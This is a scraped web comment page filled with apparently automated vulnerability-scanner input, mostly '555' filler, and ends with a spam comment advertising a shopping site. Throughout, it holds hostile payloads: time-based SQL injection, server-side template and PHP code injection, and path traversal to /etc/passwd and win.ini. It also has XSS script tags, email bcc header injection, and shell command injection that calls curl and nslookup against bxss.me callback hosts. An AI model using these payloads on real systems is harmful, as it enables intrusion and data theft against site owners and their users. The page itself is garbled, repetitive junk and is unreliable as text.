Back
Your Comments:
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
1
555
1
555
555
555
555
1
555
555
555
555
555
555
555
555
555
555
555
555
1
555
555
555
1
555
555
555
1
555
555
555
555
1
555
555
555
1
1
1
1
1
1
555
555
555
1
555
555
555
1
555
555
1
1
555
555
555
555
555
555
1
555
555
555
1
555
555
1
555
555
555
555
555
@@pPEiC
1�????%2527%2522
1
555
555
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
1
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
1
555
555
555
555
@@XW1Em
555
1�????%2527%2522
555
555
555
555
555
555
555
555
555
555
555
555
555
if(now()=sysdate(),sleep(15),0)
555
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
dfb__${98991*97996}__::.x
dfb[[${98991*97996}]]xca
dfb{{98991*97996}}xca
AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA
dfb#{xca}=123
#{98991*97996*98991*97996}
dfb{{{this}}}xca
dfb{@math key=98991 method="multiply" operand=97996/}xca
98991*97996*98991*97996
print("dfb" . 98991*97996 . "xca");
dfb{{"abc"|title}}xca
dfb#set($x=98991*97996)${x}xca
dfb<%=98991*97996%>xca
dfb@(98991*97996)xca
dfb{{=98991*97996}}xca
dfb{@98991*97996}xca
dfb{#98991*97996}xca
dfb#{98991*97996}xca
dfb${98991*97996}xca
dfb{98991*97996}xca
dfb{{98991*97996}}xca
dfb{{98991*97996}}xca
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
555
<%={{={@{#{${dfb}}%>
bfgx1077??z1??z2a?bcxhjl1077
bfg3153
5559493410
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
bxss.me
555
c:/windows/win.ini
555
/etc/shells
555
http://bxss.me/t/fit.txt?.jpg
555
Http://bxss.me/t/fit.txt
1
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
1
555
1
555
1
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
${10000430+9999538}
555
555
555
555
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
555
555
555
555
555
555
1RvZIQnzO
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
/\xfs.bxss.me?earthdivas.com
555
555
555
555
//xfs.bxss.me?earthdivas.com
555
555
xfs.bxss.me?earthdivas.com
555
555
555
http://xfs.bxss.me?earthdivas.com
555"||sleep(27*1000)*kedwbi||"
948458
555
555
xfs.bxss.me
555"&&sleep(27*1000)*qyqbhw&&"
555
555
${@print(md5(31337))}\
555
555
${@print(md5(31337))}
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
";print(md5(31337));$a="
555
555
555
555
555
555
555
555
555
1
555
555
555
;(nslookup -q=cname hityegawpeioc6a46b.bxss.me||curl hityegawpeioc6a46b.bxss.me)|(nslookup -q=cname hityegawpeioc6a46b.bxss.me||curl hityegawpeioc6a46b.bxss.me)&(nslookup -q=cname hityegawpeioc6a46b.bxss.me||curl hityegawpeioc6a46b.bxss.me)
555&n988245=v961526
555
if(now()=sysdate(),sleep(15),0)
555
`(nslookup -q=cname hitbisibfgdas841d4.bxss.me||curl hitbisibfgdas841d4.bxss.me)`
555
555
|(nslookup -q=cname hiteztgzvmvigc34e1.bxss.me||curl hiteztgzvmvigc34e1.bxss.me)
555
555
555
".gethostbyname(lc("hitea"."hqelzgym2b780.bxss.me."))."A".chr(67).chr(hex("58")).chr(108).chr(65).chr(114).chr(67)."
555
$(nslookup -q=cname hitxyvtnjmvdy4076f.bxss.me||curl hitxyvtnjmvdy4076f.bxss.me)
555
555
(nslookup -q=cname hitpqpdfudbnq94054.bxss.me||curl hitpqpdfudbnq94054.bxss.me))
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
^(#$!@#$)(()))******
555
555
!(()&&!|*|*|
555
555
)
555
555
to@example.com> bcc:009247.567-8563.567.45e50.19447.2@bxss.me
555
555
555 bcc:009247.567-8562.567.45e50.19447.2@bxss.me
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
q6fW857J
555
555
555
555
555
555
555
555
555
555
555
555
555
555
/../../../../../../../../../../windows/system32/BITSADMIN.exe
555
../555
555
555
555
file:///etc/passwd
555
555
../../../../../../../../../../../../../../windows/win.ini
555
../../../../../../../../../../../../../../etc/passwd
555
555
555
555
555
555
555
"+response.write(9489369*9437701)+"
1
555
addComments.aspx/.
response.write(9489369*9437701)
addComments.aspx�
555
addComments.aspx
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
"+"A".concat(70-3).concat(22*4).concat(122).concat(84).concat(114).concat(75)+(require"socket" Socket.gethostbyname("hitub"+"xphqszfq9ed2f.bxss.me.")[3].to_s)+"
bxss.me/t/xss.html?%00
555
555
HttP://bxss.me/t/xss.html?%00
555
555
555
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
-1)) OR 515=(SELECT 515 FROM PG_SLEEP(15))--
555
555
-5) OR 792=(SELECT 792 FROM PG_SLEEP(15))--
-5 OR 588=(SELECT 588 FROM PG_SLEEP(15))--
1
-1)) OR 405=(SELECT 405 FROM PG_SLEEP(15))--
555
555
555}body{zzz:Expre/**/SSion(ebdo(9135))}
555<ScRiPt>ebdo(9780)</sCripT>
555\u003CScRiPt\ebdo(9622)\u003C/sCripT\u003E
%35%35%35%3C%53%63%52%69%50%74%20%3E%65%62%64%6F%289958%29%3C%2F%73%43%72%69%70%54%3E
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
dfb__${98991*97996}__::.x
dfb[[${98991*97996}]]xca
dfb{{98991*97996}}xca
<%={{={@{#{${dfb}}%>
555
bfgx7279??z1??z2a?bcxhjl7279
bfg5739
5559435765
555
1
555
555
555
1
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
-1" OR 2+838-838-1=0+0+0+1 --
-1 OR 2+707-707-1=0+0+0+1
-1 OR 2+258-258-1=0+0+0+1 --
LqookVh6
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
dfb__${98991*97996}__::.x
dfb[[${98991*97996}]]xca
dfb{{98991*97996}}xca
AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA
dfb#{xca}=123
#{98991*97996*98991*97996}
dfb{{{this}}}xca
dfb{@math key=98991 method="multiply" operand=97996/}xca
98991*97996*98991*97996
print("dfb" . 98991*97996 . "xca");
dfb{{"abc"|title}}xca
dfb#set($x=98991*97996)${x}xca
dfb<%=98991*97996%>xca
dfb@(98991*97996)xca
dfb{{=98991*97996}}xca
dfb{@98991*97996}xca
dfb{#98991*97996}xca
dfb#{98991*97996}xca
dfb${98991*97996}xca
dfb{98991*97996}xca
dfb{{98991*97996}}xca
dfb{{98991*97996}}xca
555
<%={{={@{#{${dfb}}%>
bfgx5532??z1??z2a?bcxhjl5532
bfg8537
5559094399
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555"||sleep(27*1000)*spkdcg||"
555
555
555
555
555
555
555
555"&&sleep(27*1000)*xkjezb&&"
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
/\xfs.bxss.me?earthdivas.com
555
555
555
555
//xfs.bxss.me?earthdivas.com
555
555
555
xfs.bxss.me?earthdivas.com
555
555
555
555
http://xfs.bxss.me?earthdivas.com
555
555
555
921259
555
555
xfs.bxss.me
555
555
555
555
555 bcc:074625.1085-19719.1085.59efa.19344.2@bxss.me
555
555
555
555
555
555
555
555
bxss.me
555
555
555
555
555
c:/windows/win.ini
${@print(md5(31337))}\
555
555
555
555
/etc/shells
${@print(md5(31337))}
555
555
http://bxss.me/t/fit.txt?.jpg
";print(md5(31337));$a="
555
Http://bxss.me/t/fit.txt
addComments.aspx/.
555
555
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
addComments.aspx�
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
addComments.aspx
555
../../../../../../../../../../../../../../etc/passwd
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
555
555
555
555
555
"+"A".concat(70-3).concat(22*4).concat(117).concat(65).concat(116).concat(66)+(require"socket" Socket.gethostbyname("hitkj"+"ktlljrija9d45.bxss.me.")[3].to_s)+"
555
555
555
555
555
555
../../../../../../../../../../../../../../etc/passwd
555
555
555
555
555
555
bxss.me/t/xss.html?%00
555
555
555
555
555
555
HttP://bxss.me/t/xss.html?%00
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555 bcc:074625.1085-19719.1085.59efa.19344.2@bxss.me
555
555
555
555
555
555
".gethostbyname(lc("hitzo"."wrlsdmkbe193e.bxss.me."))."A".chr(67).chr(hex("58")).chr(113).chr(86).chr(105).chr(88)."
^(#$!@#$)(()))******
555
555
!(()&&!|*|*|
555
555
)
555
555
555&n952885=v943693
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555 bcc:074625.1085-19719.1085.59efa.19344.2@bxss.me
555
555
555
555
555
555
555
${9999320+9999370}
555
555
555
555
../../../../../../../../../../../../../../etc/passwd
555
${9999320+9999370}
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
3H16OI43
555
555
response.write(9167705*9254976)
555
555
1DZ8BLYz5eO
555
"+response.write(9167705*9254976)+"
response.write(9167705*9254976)
1DZ8BLYz5eO
555
555
555
555
555
555
555
555
/../../../../../../../../../../windows/system32/BITSADMIN.exe
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
1
1
1
1
555
1
555
1
555
1
555
555
555
555
555
555
1
555
1
555
1
555
555
1
555
1
555
1
555
1
555
1
555
1
1
1
1
1
1
555
1
1
Every Young ladies , Womens & Girl are Found of Shopping .For an Auspicious Occassions Like Festival , Wedding Ceremonies Engagements Ceremony So, Here We Have Some For You In Your Budget For More.... Plz visit:- http://www.indian.supply/